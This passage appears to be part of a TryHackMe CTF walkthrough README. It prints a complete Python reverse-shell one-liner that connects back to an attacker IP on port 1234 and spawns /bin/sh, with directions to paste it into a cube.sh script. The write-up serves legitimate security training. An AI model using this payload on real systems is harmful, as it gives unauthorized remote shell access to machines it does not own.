AndyJacobBarth/Problems/TryHackMe/ctf/README.md

 Well, it gives us the python code to execute a reverse shell:
 > python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

 So yes, just copy and paste this into the `cube.sh` file.
+Make sure to replace `<IP>` with your actual IP, which the attack box has within the user's name.
+If you're still unsure, do a simple `ifconfig`.

 ![alt text](image-19.png)
 </details>